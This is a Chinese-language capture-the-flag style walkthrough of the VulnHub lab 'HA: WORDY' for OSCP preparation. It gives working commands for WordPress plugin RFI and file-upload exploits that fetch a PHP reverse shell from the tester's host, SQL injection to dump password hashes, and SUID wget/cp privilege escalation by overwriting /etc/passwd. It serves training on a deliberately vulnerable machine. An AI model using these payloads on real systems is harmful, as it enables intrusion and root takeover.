靶场实战(19)：OSCP备考之VulnHub HA WORDY

交流技术可以关注公众号 OneMoreThink 或后台添加微信，欢迎提出宝贵建议。

0、总结

0.1、攻击思路

1. 资产发现

   1. 主机发现

   2. 服务发现

2. 漏洞发现（获取权限）

   1. 80端口/HTTP服务

      1. 组件漏洞

      2. URL漏洞：RFI、FileUpload

3. 提升权限

   1. www-data用户

      1. sudo

      2. suid：wget、cp

0.2、攻击路径

1. 获取权限

   1. 80 端口/HTTP 服务

      1. WordPress 插件 mail-masta 1.0，存在 RFI 远程文件包含 Nday 漏洞，可去下载反弹 webshell 并执行，反弹 www-data 用户权限。

      2. WordPress 插件 reflex-gallery 3.1.3，存在文件上传 Nday 漏洞，可被上传反弹 webshell 并执行，反弹 www-data 用户权限。

2. 提升权限

   1. suid

      1. wget 命令，可以构造下载报错时执行提权代码，返回 root 用户权限。

      2. wget 命令，可以构造特权用户/etc/passwd 并下载覆盖旧的，获得 root 用户权限。

      3. cp 命令，可以构造特权用户/etc/passwd 并复制覆盖旧的，获得 root 用户权限。

0.3、防护建议

1. 对资产清单开展漏洞扫描、渗透测试、配置核查、开源组件扫描等漏洞发现工作，并及时修复互联网高危 Nday 漏洞；

2. 对资产清单开展流量侧、主机侧等的攻击监测工作，对真实的攻击行为进行及时阻断，对成功的攻击事件进行及时处置。

1、资产发现

1.1、主机发现

本次靶场HA: WORDY^[1]指定 IP，不涉及主机发现过程。

1.2、服务发现

使用命令sudo -u root nmap 172.16.33.108 -n -Pn -p- --reason -sV -sC -O发现主机开放的端口、提供的服务、使用的组件、组件的版本。

开放的端口	提供的服务	使用的组件	组件的版本
80/tcp	http	Apache httpd	2.4.29
-	os	Ubuntu Linux	?

2、漏洞发现（获取权限）

2.1、80 端口/HTTP 服务

2.1.1、组件漏洞

0x01、Web 中间件

使用命令searchsploit Apache httpd 2.4.未发现 Web 中间件 Apache httpd 2.4.29 的 Nday 漏洞。

0x02、Web 框架

使用浏览器插件 Wappalyzer 未发现存在 Nday 漏洞的 Web 框架。

2.1.2、URL 漏洞：RFI、FileUpload

0x01、直接访问

浏览器打开http://172.16.33.108/，只是 Web 中间件默认页面。

0x02、目录扫描(dirsearch)

使用命令dirsearch -u http://172.16.33.108/ -x 403扫描网站的目录和文件并逐个检查，只有/wordpress/wp-login.php文件是有价值的。

使用命令wpscan --url http://172.16.33.108/wordpress/ --enumerate u扫描 WordPress 用户，发现admin和aarti用户。

使用命令wpscan --url http://172.16.33.108/wordpress/ --usernames admin,aarti --passwords /usr/share/wordlists/rockyou.txt爆破这俩用户的密码，2 个小时各爆破了 12 万个密码都没爆出来。

使用命令wpscan --url http://172.16.33.108/wordpress/扫描 WordPress 插件，发现 7 个插件。

01、mail-masta 1.0 插件（RFI）

使用命令searchsploit mail masta发现插件 mail-masta 1.0 的 2 个 Nday 漏洞，本地文件包含和 SQLi。

使用命令searchsploit -m 48290将本地文件包含漏洞的 EXP 拷贝到当前目录后使用命令cat 40290.txt查看，获得漏洞 URL，最终构造 URLhttp://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd在浏览器中访问，成功拿到/etc/passwd 文件，确认存在 LFI 本地文件包含漏洞。

看下有没 RFI 远程文件包含漏洞获取 shell 权限，使用命令cp /usr/share/webshells/php/php-reverse-shell.php ./将反弹 webshell 拷贝到当前目录，使用命令vim php-reverse-shell.php修改 CHANGE THIS 处的监听 ip 和 port，使用命令python3 -m http.server搭建 Web 服务器给靶机下载反弹 webshell，使用命令nc -nvlp 33108监听反弹 shell，构造 URLhttp://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://10.8.0.110:8000/php-reverse-shell.php在浏览器中访问，最终拿到www-data用户的 shell 权限，成功突破边界。

使用命令searchsploit -m 41438将 SQLi 漏洞的 EXP 拷贝到当前目录后使用命令cat 41438.txt查看，一共是 4 个 SQLi 漏洞，但第 2-4 个需要登录 admin 账户后才能利用，而第 1 个不需要。构造 URLhttp://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php进行访问，获得一个export.csv文件，但里面除了 Email 单词外啥也没有。

02、reflex-gallery 3.1.3 插件（FileUpload）

使用命令searchsploit reflex gallery发现插件 reflex-gallery 3.1.3 的 1 个 Nday 漏洞，是任意文件上传漏洞。使用命令searchsploit -m 36374将 EXP 拷贝到当前目录后使用命令cat 36374.txt查看漏洞利用方式，发现 EXP 里提供了文件上传漏洞的利用页面和文件上传后的 URL。

使用命令vim 36374.html编辑文件上传漏洞的利用页面后，使用命令python3 -m http.server搭建 Web 服务器，在浏览器中访问文件上传漏洞的利用页面http://127.0.0.1:8000/36374.html并上传改好了 ip 和 port 的反弹 Webshell/usr/share/webshells/php/php-reverse-shell.php，但是报错{"error":"Directory does not exist and could not be created."}。

经过分析，要上传文件的文件夹不存在且不能创建，那就找个存在的文件夹吧。浏览发现存在2019-09和2022-11两个文件夹，修改文件上传漏洞的利用页面后重新上传反弹 webshell，最终上传成功。

使用命令nc -nvlp 33108监听端口后，浏览器访问反弹 webshell 地址http://172.16.33.108/wordpress/wp-content/uploads/2019/09/php-reverse-shell.php，最终成功获得 www-data 用户的权限。

03、site-editor 1.1.1 插件（LFI）

使用命令searchsploit WordPress site editor发现插件 site-editor1.1.1 的 1 个 Nday 漏洞，是本地文件包含漏洞。使用命令searchsploit -m 44340将 EXP 拷贝到当前目录后使用命令cat 44340.txt获得漏洞 URL，最终构造 URLhttp://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd在浏览器中访问，成功拿到/etc/passwd 文件，确认存在 LFI 本地文件包含漏洞。

看下有没 RFI 远程文件包含漏洞获取 shell 权限，使用命令cp /usr/share/webshells/php/php-reverse-shell.php ./将反弹 webshell 拷贝到当前目录，使用命令vim php-reverse-shell.php修改 CHANGE THIS 处的监听 ip 和 port，使用命令python3 -m http.server搭建 Web 服务器给靶机下载反弹 webshell，使用命令nc -nvlp 33108监听反弹 shell，构造 URLhttp://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=http://10.8.0.110:8000/php-reverse-shell.php在浏览器中访问，结果报错{"success":false,"message":"Error: didn't load shortcodes pattern file"}，看来不存在远程文件件包含漏洞。

除此之外访问其它 Linux 文件、以及尝试进行命令执行，均无收获。

04、slideshow-gallery 1.4.6 插件

使用命令searchsploit slideshow gallery 1.4.6发现插件 slideshow-gallery 1.4.6 的 1 个 Nday 漏洞，是任意文件上传漏洞。使用命令searchsploit -m 34514将 EXP 拷贝到当前目录后使用命令cat 34514.txt查看漏洞详情，发现需要 admin 用户权限才能执行，只能放弃。

05、wp-easycart-data 插件

使用命令searchsploit easycart data未发现 wp-easycart-data 插件的 Nday 漏洞。

06、wp-support-plus-responsive-ticket-system7.1.3 插件

使用命令searchsploit wp support plus responsive ticket system发现 wp-support-plus-responsive-ticket-system7.1.3 插件的 2 个 Nday 漏洞，是 SQLi 和权限提升漏洞。

使用命令searchsploit -m 40939将 SQLi 漏洞的 EXP 拷贝到当前目录后使用命令cat 40939.txt查看漏洞详情，发现需要 admin 账户才能执行，只能作罢。

使用命令searchsploit -m 41006将权限提升漏洞的 EXP 拷贝到当前目录后使用命令cat 41006.txt查看漏洞详情，发现需要 admin 账户才能执行，只能作罢。   

07、wp-symposium15.1 插件（SQLi）

使用命令searchsploit wp symposium 15.1发现 wp-symposium15.1 插件的 3 个 Nday 漏洞，都是 SQLi。

使用命令cat 37080.txt查看第一个 EXP 详情，有 3 个 Payload，逐个测试，未发现存在该 SQLi 漏洞。

使用命令cat 37824.txt查看第二个 EXP 详情，并构造漏洞验证 URLhttp://172.16.33.108/wordpress/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--在浏览器中访问，成功获得响应，确认漏洞存在。

然后构造 POCconcat(user_login,char(58),user_pass) from wordpress.wp_users;--并进行 URL 编码，来读取 WordPress 的用户密码，获得admin:$P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0.，但是CMD5^[2]和SOMD5^[3]都无法解密，刚才 wpscan2 个小时爆破了 12 万个密码都没爆出来，因此放弃制作彩虹表。

想重置 admin 用户的密码，但用 sqlmap 识别出注入点不支持堆叠注入，无法执行 UPDATE 语句，只能作罢。

使用命令cat 37822.txt查看第三个 EXP 详情，并构造漏洞验证 Payload 和正常请求进行对比，结果两个请求的响应都是延迟相同的 21 秒，没有区别，因此不存在该延迟注入。

0x02、目录扫描(dirb)

使用命令dirb http://172.16.33.108/ -X .txt,.zip扫描网站的目录和文件，发现两个文件。其中/notes.txt文件让我们留意 ZIP 文件，而secret.zip文件里面是link.txt文件，需要密码才能解压出来，但是使用/usr/share/john/password.lst和/usr/share/wordlists/rockyou.txt两个字典共计 1434 万个密码，都无法爆破出解压密码。

0x03、模糊测试

基于目前已知情况，没有对网站的目录和文件进行 FUZZ 的必要。

0x04、切换协议

使用浏览器访问https://172.16.33.108:80/，提示网站没有使用 SSL 协议。

3、提升权限

使用命令which python和which python3查看靶机使用哪个版本的 Python，发现使用了 Python3。使用命令python3 -c 'import pty; pty.spawn("/bin/bash")'获得交互式 shell。

3.1、www-data 用户

3.1.1、sudo

使用命令sudo -l查看当前用户能以谁的权限执行什么命令，发现需要当前用户的 SSH 密码才能查看。由于没有，只能作罢。

3.1.2、suid：wget、cp

使用命令find / -perm -u=s -type f -ls 2>/dev/null查看哪些命令在执行时会以该命令属主的权限执行，发现还不少。

逐个在GTFOBins^[4]查询能否用于提权，发现/usr/bin/wget可以。分别执行 EXPTF=$(mktemp)、chmod +x $TF、echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF、/usr/bin/wget --use-askpass=$TF 0，最终获得该命令属主 root 用户的权限，成功完成提权。

同时还可以往/etc/passwd 中植入特权用户进行提权，首先在靶机上使用命令cat /etc/passwd打印出来拷贝到本地。

然后在本地使用命令openssl passwd -6 -salt salt 123456生成 SSH 密码 123456，并基于刚才靶机打印出来的 passwd 文件，使用命令vim passwd创建植入了特权账户hacker和密码123456的新 passwd 文件，再使用命令python3 -m http.server开启 Web 服务器提供给靶机下载。

最后靶机使用命令wget http://10.8.0.110:8000/passwd -O /etc/passwd下载新的 passwd 文件覆盖旧的，最后使用命令su hacker和密码123456可以切换到 root 权限的 hacker 用户，成功进行提权。

逐个在GTFOBins^[5]查询能否用于提权，发现/bin/cp可以，有 3 个 EXP，但逐个尝试，全都失败了无法提权。

但是可以在靶机上使用命令cp /etc/shadow /tmp/shadow将密码文件拷贝出来，然后在本地使用命令john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt进行爆破，但是失败了，没能爆破出来。

不过可以往/etc/passwd 中植入特权用户进行提权，步骤参考刚才 wget 的，只是最后靶机使用命令wget http://10.8.0.110:8000/passwd -O /tmp/passwd下载新的 passwd 文件，然后使用命令cp /tmp/passwd /etc/passwd进行替换，再使用命令su hacker和密码123456可以切换到 root 权限的 hacker 用户，成功进行提权。

参考资料

[1]

HA: WORDY: https://www.vulnhub.com/entry/ha-wordy,363/

[2]

CMD5: https://cmd5.com

[3]

SOMD5: https://www.somd5.com

[4]

GTFOBins: https://gtfobins.github.io

[5]

GTFOBins: https://gtfobins.github.io